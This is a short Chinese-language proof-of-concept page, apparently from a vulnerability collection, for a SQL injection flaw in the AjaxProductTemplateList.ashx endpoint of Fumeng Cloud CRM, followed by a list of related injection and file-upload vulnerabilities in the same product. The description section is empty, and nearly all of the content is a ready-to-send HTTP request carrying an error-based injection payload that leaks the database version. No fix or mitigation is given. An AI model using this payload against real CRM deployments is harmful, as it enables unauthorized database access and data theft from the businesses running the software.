孚盟云CRM AjaxProductTemplateList.ashx SQL注入漏洞

漏洞描述

PoC代码

GET /m/Dingding/Ajax/AjaxProductTemplateList.ashx?method=SendMail&templateId=-1'and+1=@@VERSION-- HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Priority: u=0, i
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

相关漏洞推荐

• 孚盟云CRM LicManage.ashx SQL 注入漏洞
• 孚盟云CRM /Ajax/GetDropDownListContent.ashx SQL 注入漏洞
• 孚盟云CRM /m/Dingding/Ajax/AjaxAttachment.ashx SQL 注入漏洞
• 孚盟云CRM AjaxProductTemplateList.ashx SQL 注入漏洞
• POC 孚盟云CRM ReportShow.aspx SQL 注入漏洞
• 孚盟云CRM AjaxWriteMail.ashx 存在文件上传漏洞
• POC 孚盟云 CRM /m/Dingding/Ajax/AjaxCoustomerShare.ashx SQL 注入漏洞
• 孚盟云CRM upload.ashx 存在SQL注入
• 孚盟云 CRM /m/Dingding/Ajax/ClientCardHandler.ashx SQL 注入漏洞
• 孚盟云CRM ClientCardHandler.ashx 存在SQL注入漏洞
• POC fumengyun-crm-geticon-sqli: 孚盟云CRM GetIcon.aspx接口存在SQL注入漏洞
• 孚盟云CRM管理系统 /Common/GetIcon.aspx SQL 注入漏洞